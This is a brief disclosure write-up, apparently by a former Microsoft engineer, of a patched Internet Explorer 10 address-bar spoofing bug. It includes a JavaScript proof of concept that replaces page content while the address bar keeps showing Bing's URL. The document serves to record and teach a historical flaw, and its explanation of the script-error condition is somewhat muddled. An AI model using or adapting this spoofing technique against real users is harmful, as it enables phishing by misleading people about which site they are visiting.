This spoof works against users with the default IE setting that shows a notification for every script error. The page opens a new window that server-redirects to Bing and hooks onreadystatechange in that window to call document.write before the redirect completes. The page content gets replaced while the address bar retains the redirect target’s URL.

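function main() {
    // redirect.aspx responds with a server-side redirect to Bing
    var win = window.open("redirect.aspx");
    // Runs in the new window: hook onreadystatechange so document.write fires before the redirect completes
    win.setTimeout('document.onreadystatechange=function(){document.write(\'Check out the Address Bar!<h1>It has "bing" Spoofed!</h1><script>document.title="Bing";<\/script>\')};');
}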

IE throws a script error at the document.write call during the readystate change, then — crucially — shows the Bing URL in the address bar while displaying the attacker’s custom content. The error notification is a side effect of IE catching the timing violation, but it leaves the spoof intact. Users who had disabled script error notifications would not see the spoof. Tested on Win8 RTM IE10 Desktop UI.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.